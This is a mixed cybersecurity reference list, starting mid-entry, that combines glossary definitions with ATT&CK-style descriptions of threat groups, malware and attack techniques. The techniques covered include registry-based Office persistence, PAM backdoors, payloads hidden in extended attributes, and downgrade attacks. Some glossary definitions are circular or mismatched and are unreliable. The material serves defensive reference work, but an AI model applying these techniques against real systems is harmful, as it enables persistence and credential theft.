* <code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

Term: Model
Definition: A detailed description or scaled representation of one component of a larger system that can be created, operated, and analyzed to predict actual operational characteristics of the final produced component.

Term: SAN
Definition: A field in an X.509 certificate that identifies one or more fully qualified domain names, IP addresses, email addresses, URIs, or UPNs to be associated with the public key contained in a certificate.

Term: Challenge-Response Protocol
Definition: An authentication protocol where the verifier sends the claimant a challenge (usually a random value or a nonce) that the claimant combines with a secret (often by hashing the challenge and a shared secret together, or by applying a private key operation to the challenge) to generate a response that is sent to the verifier. The verifier can independently verify the response generated by the Claimant (such as by re-computing the hash of the challenge and the shared secret and comparing to the response, or performing a public key operation on the response) and establish that the Claimant possesses and controls the secret.

Term: roots of trust
Definition: Highly reliable hardware, firmware, and software components that perform specific, critical security functions. Because roots of trust are inherently trusted, they must be secure by design. Roots of trust provide a firm foundation from which to build security and trust.

Term: PR
Definition: Develop and implement the appropriate safeguards to ensure delivery of critical infrastructure services.

Term: pseudorandom number generator
Definition: A random bit generator that includes a DRBG algorithm and (at least initially) has access to a source of randomness. The DRBG produces a sequence of bits from a secret initial value called a seed. A cryptographic DRBG has the additional property that the output is unpredictable given that the seed is not known. A DRBG is sometimes also called a pseudo-random number generator (PRNG) or a deterministic random number generator.

Term: life cycle stages
Definition: The period of time that begins when a system is conceived and ends when the system is no longer available for use. 
Refer to life cycle stages.

Term: Hash algorithm
Definition: See hash function. “Hash algorithm” and “hash function” are used interchangeably in this Recommendation.

Term: Uninterruptible Power Supply
Definition: A device with an internal battery that allows connected devices to run for at least a short time when the primary power source is lost.

Term: Confidentiality Impact
Definition: measures the potential impact on confidentiality of a successfully exploited misuse vulnerability. Confidentiality refers to limiting information access and disclosure and system access to only authorized users, as well as preventing access by, or disclosure to, unauthorized parties.

Term: Non-Automated Checklist
Definition: A checklist that is designed to be used manually, such as English prose instructions that describe the steps an administrator should take to secure a system or to verify its security settings.

Name: APT39
Type: intrusion-set
Description: APT39 is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. APT39 has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.

Name: System Firmware
Type: attack-pattern
Description: Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

Term: Diffie-Hellman
Definition: A method used to securely exchange or establish secret keys across an insecure network. Ephemeral Diffie-Hellman is used to create temporary or single-use secret keys.

Term: public key cryptography (PKC)
Definition: See public key cryptography (PKC).

Term: Network Traffic
Definition: Computer network communications that are carried over wired or wireless networks between hosts.

Term: KTS-OAEP-basic
Definition: The basic form of the key-transport Scheme with Optimal Asymmetric Encryption Padding.

Term: ONS
Definition: An inter-enterprise subsystem for the EPCglobal Network that provides network resolution services that direct EPC queries to the location where information associated with that EPC can be accessed by authorized users.

Term: Scheme
Definition: Set of rules and procedures that describes the objects of conformity assessment, identifies the specified requirements and provides the methodology for performing conformity assessment.

Name: AppleSeed
Type: malware
Description: AppleSeed is a backdoor that has been used by Kimsuky to target South Korean government, academic, and commercial targets since at least 2021.

Term: SHA-1
Definition: The SHA-1 hash for the resource.

Term: AO
Definition: A senior (federal) official or executive with the authority to formally assume responsibility for operating an information system at an acceptable level of risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation.

Term: information security continuous monitoring (ISCM) program
Definition: A program established to collect information in accordance with preestablished metrics, utilizing information readily available in part through implemented security controls.

Term: security assessment
Definition: The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for a system or organization.

Term: Test, Training, and Exercise (TT&E) Event
Definition: An event used to support the maintenance of an IT plan by allowing organizations to identify problems related to an IT plan and implement solutions before an adverse situation occurs.

Term: Actor
Definition: The source of risk that can result in harmful impact.

Term: system security plan
Definition: Formal document that provides an overview of the security requirements for a system and describes the security controls in place or planned for meeting those requirements.

Term: Identity Provider (IdP)
Definition: The party in a federation transaction that creates an assertion for the subscriber and transmits the assertion to the RP.

Term: Biometrics
Definition: Automated recognition of individuals based on their biological and behavioral characteristics.

Term: C2
Definition: The exercise of authority and direction by a properly designated commander over assigned and attached forces in the accomplishment of the mission. Command and control functions are performed through an arrangement of personnel, equipment, communications, facilities, and procedures employed by a commander in planning, directing, coordinating, and controlling forces and operations in the accomplishment of the mission.

Name: Mustard Tempest
Type: intrusion-set
Description: Mustard Tempest is an initial access broker that has operated the SocGholish distribution network since at least 2017. Mustard Tempest has partnered with Indrik Spider to provide access for the download of additional malware including LockBit, WastedLocker, and remote access tools.

Term: SCRM
Definition: the implementation of processes, tools or techniques to minimize the adverse impact of attacks that allow the adversary to utilize implants or other vulnerabilities inserted prior to installation in order to infiltrate data, or manipulate information technology hardware, software, operating systems, peripherals (information technology products) or services at any point during the life cycle.

Term: Mapping
Definition: An indication that one concept is related to another concept.

Term: <em>e</em>
Definition: The original input string of zero and one bits to be tested.

Term: <em>W-1(C)</em>
Definition: The output of the unwrapping function for KW and KWP applied to the bit string C.

Term: Wireless Local Area Network (WLAN)
Definition: A group of wireless access points and associated infrastructure within a limited geographic area, such as an office building or building campus, that is capable of radio communications. WLANs are usually implemented as extensions of existing wired LANs to provide enhanced user mobility.

Name: Network Device CLI
Type: attack-pattern
Description: Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or SSH.

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.

Term: information system component
Definition: A software object, meant to interact with other components, encapsulating certain functionality or a set of functionalities. A component has a clearly defined interface and conforms to a prescribed behavior common to all components within an architecture.

Term: VRF
Definition: The process of testing the media to ensure the information cannot be read.

Term: information resources
Definition: Information and related resources, such as personnel, equipment, funds, and information technology.

Term: vulnerability analysis
Definition: Formal description and evaluation of the vulnerabilities in an information system.

Name: Pluggable Authentication Modules
Type: attack-pattern
Description: Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.

Name: HotCroissant
Type: malware
Description: HotCroissant is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA. HotCroissant shares numerous code similarities with Rifdoor.

Term: records
Definition: The recordings (automated and manual) of evidence of activities performed or results achieved (e.g., forms, reports, test results), which serve as a basis for verifying that the organization and the system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain the complete set of information on particular items).

Term: Federal Profile
Definition: Profile of the IoT device cybersecurity capability core baseline [NISTIR 8259A] and non-technical supporting capability core baseline [NISTIR 8259B] to provide security guidance provided to federal government organizations related to IoT devices.

Name: Downgrade Attack
Type: attack-pattern
Description: Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation.

Adversaries may downgrade and use various less-secure versions of features of a system, such as Command and Scripting Interpreter or even network protocols that can be abused to enable Adversary-in-the-Middle or Network Sniffing. For example, PowerShell versions 5+ includes Script Block Logging (SBL), which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to impair defenses while running malicious scripts that may have otherwise been detected.

Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text. On Windows systems, adversaries may downgrade the boot manager to a vulnerable version that bypasses Secure Boot, granting the ability to disable various operating system security mechanisms.

Term: DSA
Definition: A Federal Information Processing Standard for digital signatures, based on the mathematical concept of modular exponentiations and the discrete logarithm problem.

Term: Limit, Specification
Definition: See Limit, Specification.

Term: assessor
Definition: The individual, group, or organization responsible for conducting a risk assessment.

Term: Cloud Carrier
Definition: An intermediary that provides connectivity and transport of cloud services from Cloud Providers to Cloud Consumers

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password), something you have (e.g., cryptographic identification device, token), or something you are (e.g., biometric).

Term: Key wrapping algorithm
Definition: A cryptographic algorithm approved for use in wrapping keys.

Term: Biometric Verification Decision
Definition: A determination of whether biometric probe(s) and biometric reference(s) have the same biometric source based on comparison score(s) during a biometric verification transaction.

Term: <em>min(x, y)</em>
Definition: The minimum of x and y; min(x, y) = x if x < y, and min(x, y) = y otherwise

Term: sanitization
Definition: A process or method to sanitize.

Term: Anonymized Information
Definition: Previously identifiable information that has been de-identified and for which a code or other association for re-identification no longer exists.

Term: hyperparameter
Definition: In a differential privacy mechanism, a setting or parameter that controls a portion of the mechanism’s behavior or execution. The best setting may be data‐dependent, and a method that uses the confidential data as the basis for these parameters would not satisfy differential privacy. Examples include the clipping parameter for mechanisms that perform clipping, the number of iterations for iterative algorithms, and the learning rate or minibatch size for machine learning algorithms.

Term: high-impact system
Definition: An information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high.

Term: DLC
Definition: Discrete Logarithm Cryptography, which is comprised of both Finite Field Cryptography (FFC) and Elliptic Curve Cryptography (ECC).

Term: trust relationship
Definition: Policies that govern how entities in differing domains honor each other’s authorizations. An authority may be completely trusted—for example, any statement from the authority will be accepted as a basis for action—or there may be limited trust, in which case only statements in a specific range are accepted.

Term: verifier
Definition: An entity that verifies the Claimant’s identity by verifying the Claimant’s possession and control of a token using an authentication protocol. To do this, the Verifier may also need to validate credentials that link the token and identity and check their status.

Name: Exploits
Type: attack-pattern
Description: Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Stealth, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Term: POP
Definition: A verification process whereby assurance is obtained that the owner of a key pair actually has the private key associated with the public key.

Name: Restrict File and Directory Permissions
Type: course-of-action
Description: Restricting file and directory permissions involves setting access controls at the file system level to limit which users, groups, or processes can read, write, or execute files. By configuring permissions appropriately, organizations can reduce the attack surface for adversaries seeking to access sensitive data, plant malicious code, or tamper with system files.

Enforce Least Privilege Permissions:

- Remove unnecessary write permissions on sensitive files and directories.
- Use file ownership and groups to control access for specific roles.

Example (Windows): Right-click the shared folder → Properties → Security tab → Adjust permissions for NTFS ACLs.

Harden File Shares:

- Disable anonymous access to shared folders.
- Enforce NTFS permissions for shared folders on Windows.

Example: Set permissions to restrict write access to critical files, such as system executables (e.g., `/bin` or `/sbin` on Linux). Use tools like `chown` and `chmod` to assign file ownership and limit access.

On Linux, apply:
`chmod 750 /etc/sensitive.conf`
`chown root:admin /etc/sensitive.conf`

File Integrity Monitoring (FIM):

- Use tools like Tripwire, Wazuh, or OSSEC to monitor changes to critical file permissions.

Audit File System Access:

- Enable auditing to track permission changes or unauthorized access attempts.
- Use auditd (Linux) or Event Viewer (Windows) to log activities.

Restrict Startup Directories:

- Configure permissions to prevent unauthorized writes to directories like `C:\ProgramData\Microsoft\Windows\Start Menu`.

Example: Restrict write access to critical directories like `/etc/`, `/usr/local/`, and Windows directories such as `C:\Windows\System32`.

- On Windows, use icacls to modify permissions: `icacls "C:\Windows\System32" /inheritance:r /grant:r SYSTEM:(OI)(CI)F`
- On Linux, monitor permissions using tools like `lsattr` or `auditd`.

Term: identity proofing
Definition: The processes used to collect, validate, and verify information about a subject to establish assurance in the subject’s claimed identity.

Term: Capabilities Catalog
Definition: Comprehensive list of device cybersecurity capabilities derived from analysis of comprehensive list of source documents for the application or sector. For the federal sector, NIST SP 800-53 Rev. 5 provided the definition of controls used to create the NIST-generated capabilities catalog used for the Federal profile.

Term: Active Tag
Definition: A tag that relies on a battery for power.

Term: Administrative domain
Definition: A logical collection of hosts and network resources (e.g., department, building, company, organization) governed by common policies.

Term: survivability
Definition: The ability of a system to minimize the impact of a finite-duration disturbance on value delivery (i.e., stakeholder benefit at cost), achieved through the reduction of the likelihood or magnitude of a disturbance; the satisfaction of a minimally acceptable level of value delivery during and after a disturbance; and/or a timely recovery.

Term: Rough Order of Magnitude
Definition: See Read-Only Memory.

Term: authenticate
Definition: For the purposes of this guide, the process of verifying the identity claimed by a WiMAX device. User authentication is also an option supported by IEEE 802.16e-2005.

Term: digital signature
Definition: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation.

Term: PHI
Definition: <p>Individually identifiable health information:</p><p style="margin-left:.25in;">(1) Except as provided in paragraph (2) of this definition, that is:</p><p style="margin-left:.5in;">(i) Transmitted by electronic media;</p><p style="margin-left:.5in;">(ii) Maintained in electronic media; or</p><p style="margin-left:.5in;">(iii) Transmitted or maintained in any other form or medium.</p><p style="margin-left:.25in;">(2) Protected health information excludes individually identifiable health information:</p><p style="margin-left:.5in;">(i) In education records covered by the Family Educational Rights and Privacy Act, as amended, 20 U.S.C. 1232g;</p><p style="margin-left:.5in;">(ii) In records described at 20 U.S.C. 1232g(a)(4)(B)(iv);</p><p style="margin-left:.5in;">(iii) In employment records held by a covered entity in its role as employer; and</p><p>(iv) Regarding a person who has been deceased for more than 50 years.</p>

Term: Implementation Tier
Definition: Provides a point of reference on how an organization views privacy risk and whether it has sufficient processes and resources in place to manage that risk.

Term: Template Matcher
Definition: In the PIV context a matcher is a software library providing for the comparison of images conformant to FINGSTD and templates conformant to MINUSTD. The output of the matcher, a similarity score, will be the basis of accept or reject decision.

Term: RPO
Definition: The point in time to which data must be recovered after an outage.

Term: ensemble learning
Definition: A type of a meta machine learning approach that combines the predic­tions of several models to improve performance.

Term: Identity authentication
Definition: The process of providing assurance about the identity of an entity interacting with a system (e.g., to access a resource). Sometimes called entity authentication. Compare with source authentication.

Name: Cardinal RAT
Type: malware
Description: Cardinal RAT is a potentially low volume remote access trojan (RAT) observed since December 2015. Cardinal RAT is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.

Term: common secure configuration
Definition: A recognized standardized and established benchmark that stipulates specific secure configuration settings for a given information technology platform.

Term: Extended Validation Certificate
Definition: A certificate used for https websites and software that includes identity information, subjected to an identity verification process standardized by the CA Browser Forum in its Baseline Requirements which verifies the identified owner of the website for which the certificate has been issued has exclusive rights to use the domain; exists legally, operationally, and physically; and has authorized the issuance of the certificate.

Term: Address
Definition: Additional input that is bound to the secret keying material; a byte string.

Name: DanBot
Type: malware
Description: DanBot is a first-stage remote access Trojan written in C# that has been used by HEXANE since at least 2018.

Name: Exbyte
Type: malware
Description: Exbyte is an exfiltration tool written in Go that is uniquely associated with BlackByte operations. Observed since 2022, Exbyte transfers collected files to online file sharing and hosting services.

Term: Outage
Definition: A period when a service or an application is not available or when equipment is not operational.

Name: Extended Attributes
Type: attack-pattern
Description: Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`, `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.

An adversary may leverage xattrs by embedding a second-stage payload into the extended attribute of a legitimate file. On macOS, a payload can be embedded into a custom attribute using the `xattr` command. A separate loader can retrieve the attribute with `xattr -p`, decode the content, and execute it using a scripting interpreter. On Linux, an adversary may use `setfattr` to write a payload into the `user.` namespace of a legitimate file. A loader script can later extract the payload with `getfattr --only-values`, decode it, and execute it using bash or another interpreter. In both cases, because the primary file content remains unchanged, security tools and integrity checks that do not inspect extended attributes will observe the original file hash, allowing the malicious payload to evade detection.

Term: GPRS Location Information
Definition: the Routing Area Information (RAI), Routing Area update status, and other location information maintained on the SIM.

Term: capability
Definition: A set of mutually reinforcing security controls implemented by technical, physical, and procedural means. Such controls are typically selected to achieve a common information security-related purpose.

Term: Password Protected
Definition: The ability to protect the contents of a file or device from being accessed until the correct password is entered.

Term: sensitive information
Definition: See controlled unclassified information (CUI). 
Note: The term sensitive information as well as others such as For Official Use Only (FOUO) and Sensitive But Unclassified (SBU) will no longer be used upon implementation of 32 CFR 2002.

Term: Word
Definition: A group of 32 bits that is treated either as a single entity or as an array of 4 bytes.

Name: Volt Typhoon
Type: intrusion-set
Description: Volt Typhoon is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. Volt Typhoon's targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. Volt Typhoon has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.. The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.. 

Reporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to Volt Typhoon, also tracked as VOLTZITE, for follow-on operations.

Term: Focal Document Element
Definition: A discrete section, sentence, phrase, or other identifiable piece of content from a Focal Document.

Term: DP
Definition: A rigorous mathematical definition of disclosure that considers the risk that an individual's confidential data may be learned as a result of a mathematical analysis based on that data being made publicly available.

Term: safeguards
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system.

Name: NGLite
Type: malware
Description: NGLite is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.

Term: Integrity authentication
Definition: The process of providing assurance that data has not been modified since a message authentication code or digital signature was created for that data.

Term: CVC
Definition: A certificate stored on the PIV Card that includes a public key, the signature of a certification authority, and further information needed to verify the certificate.

Name: Compromise Infrastructure
Type: attack-pattern
Description: Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with Digital Certificates) to further blend in and support staged information gathering and/or Phishing campaigns. Adversaries may also compromise numerous machines to support Proxy and/or proxyware services or to form a botnet. Additionally, adversaries may compromise infrastructure residing in close proximity to a target in order to gain Initial Access via Wi-Fi Networks.

By using compromised infrastructure, adversaries may enable follow-on malicious operations. Prior to targeting, adversaries may also compromise the infrastructure of other adversaries.

Name: Trojan.Karagany
Type: malware
Description: Trojan.Karagany is a modular remote access tool used for recon and linked to Dragonfly. The source code for Trojan.Karagany originated from Dream Loader malware which was leaked in 2010 and sold on underground forums.

Term: assurance evidence
Definition: The information upon which decisions regarding assurance, trustworthiness, and risk of the solution are substantiated. 
Note: Assurance evidence is specific to an agreed-to set of claims. The security perspective focuses on assurance evidence for security-relevant claims whereas other engineering disciplines may have their own focus (e.g., safety).

Term: security control assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Term: system security officer
Definition: Individual with assigned responsibility for maintaining the appropriate operational security posture for a system or program.

Term: hash digest
Definition: See Hash digest.

Term: Conformance Testing
Definition: A process established by NIST within its responsibilities of developing, promulgating, and supporting FIPS for testing specific characteristics of components, products, and services, as well as people and organizations for compliance with a FIPS.

Term: probability of occurrence
Definition: A weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability or a set of vulnerabilities.

Term: system element
Definition: A hardware, software, or firmware part or element of a larger system with well-defined inputs and outputs and a specific function.

Term: awareness training
Definition: The foundational cybersecurity or privacy training program for all personnel. It is designed to help learners understand the roles that they play in protecting information, cybersecurity, and privacy-related assets. It often consists of instructor-led and online courses, exercises, or other methods that inform learners of the acceptable uses of and risks to the organization’s systems.

Term: ACP
Definition: The set of rules that define the conditions under which an access may take place.

Term: Security Authorization
Definition: Access privileges that are granted to an entity that convey an “official” sanction to perform a security function or activity.

Term: information system security plan
Definition: A document that describes how an organization meets or plans to meet the security requirements for a system. In particular, the system security plan describes the system boundary, the environment in which the system operates, how the security requirements are satisfied, and the relationships with or connections to other systems.

Term: Informative References
Definition: Specific sections of standards, guidelines, and practices common among critical infrastructure sectors that illustrate a method to achieve the outcomes associated with each Subcategory in the Cybersecurity Framework.

Term: applicant
Definition: An individual who has applied for but has not yet been issued a Derived PIV Credential.

Name: TA2541
Type: intrusion-set
Description: TA2541 is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. TA2541 campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.

Name: Volgmer
Type: malware
Description: Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing.

Term: cryptographic key
Definition: A bit string used as a secret parameter by a cryptographic algorithm. In this Recommendation, a cryptographic key is either a random bit string of a length specified by the cryptographic algorithm or a pseudorandom bit string of the required length that is computationally indistinguishable from one selected uniformly at random from the set of all bit strings of that length.

Name: Equation
Type: intrusion-set
Description: Equation is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives.

Term: Tag Talks First
Definition: An RF transaction in which the tag communicates its presence to a reader. The reader may then send commands to the tag.

Term: red teaming
Definition: In the AI context, means a structured testing effort, often adopting adversarial methods, to find flaws and vulnerabilities in an AI system, including unforeseen or undesirable system behaviors or potential risks associated with the misuse of the system.

Term: hash digest
Definition: The result of applying a hash function to information; also called a message digest.

Name: Malvertising
Type: attack-pattern
Description: Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements. Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. 

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software. Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts. 

Malvertising may be used to support Drive-by Target and Drive-by Compromise, potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement. Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.

Term: Semi-Quantitative Assessment
Definition: The use of a set of methods, principles, or rules for assessing risk based on bins, scales, or representative numbers whose values and meanings are not maintained in other contexts.

Term: package management system
Definition: An administrative tool or utility that facilitates the installation and maintenance of software on a given host, device or pool of centrally managed hosts, and the reporting of installed software attributes. May also be referred to as package manager, software manager, application manager, or app manager.

Term: Choreography
Definition: Defines the requirements and sequences through which multiple Web services interact.

Term: CD-RW
Definition: ACompact Disc Read/Write(CD-RW) isaCD that can be Purged and rewritten multiple times.

Term: statistical bias
Definition: A form of bias that occurs when the expected value of a released statistic does not match the true statistic.

Name: HDoor
Type: malware
Description: HDoor is malware that has been customized and used by the Naikon group.

Term: Focal Document
Definition: A NIST document that is used as the basis for comparing its elements with elements from another document. Examples of Focal Documents include the Cybersecurity Framework version 2.0, the Privacy Framework version 1.0, and SP 800-53 Revision 5.

Name: ADVSTORESHELL
Type: malware
Description: ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase.

Term: <em>int(X)</em>
Definition: The integer for which the bit string X is the binary representation.

Term: Reward system
Definition: A means of providing blockchain network users an award for activities within the blockchain network (typically used as a system to reward successful publishing of blocks). Also known as incentive systems.

Term: Threat Intelligence Report
Definition: A prose document that describes TTPs, actors, types of systems and information being targeted, and other threat-related information.

Name: Mofang
Type: intrusion-set
Description: Mofang is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.

Term: Key-derivation key
Definition: A key used with a key-derivation function or method to derive additional keys. Sometimes called a master key.

Term: MF
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors. The three authentication factors are something you know, something you have, and something you are.

Term: margin
Definition: A spare amount or measure or degree allowed or given for contingencies or special situations. The allowances carried to account for uncertainties and risks.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples include: 1. The transformation of plaintext data into ciphertext data, 2. The transformation of ciphertext data into plaintext data, 3. The computation of a digital signature from data, 4. The verification of a digital signature, 5. The computation of an authentication code from data, 6. The verification of an authentication code from data and a received authentication code, 7. The computation of a shared secret that is used to derive keying material.

Name: Poseidon Group
Type: intrusion-set
Description: Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.

Term: <em>IDP, IDR, IDU, IDV</em>
Definition: Identifier bit strings for parties P, R, U, and V, respectively.

Term: Randomness extraction
Definition: The first step in the two-step key-derivation procedure specified in this Recommendation; during this step, a key-derivation key is produced from a shared secret.

Term: system component
Definition: A hardware, software, or firmware part or element of a larger system with well-defined inputs and outputs and a specific function.

Term: cover (TRANSEC)
Definition: See cover (TRANSEC).

Name: Cyclops Blink
Type: malware
Description: Cyclops Blink is a modular malware that has been used in widespread campaigns by Sandworm Team since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus. Cyclops Blink is assessed to be a replacement for VPNFilter, a similar platform targeting network devices.

Name: APT30
Type: intrusion-set
Description: APT30 is a threat group suspected to be associated with the Chinese government. While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches.

Term: CSF Quick Start Guide
Definition: A supplementary resource that gives brief, actionable guidance on specific CSF-related topics.

Name: Internal Spearphishing
Type: attack-pattern
Description: After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating Impersonation.

For example, adversaries may leverage Spearphishing Attachment or Spearphishing Link as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through Input Capture on sites that mimic login interfaces.

Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.

Term: pseudorandom number generator
Definition: See Deterministic Random Bit Generator.

Term: security attribute
Definition: An abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.

Term: On-Card
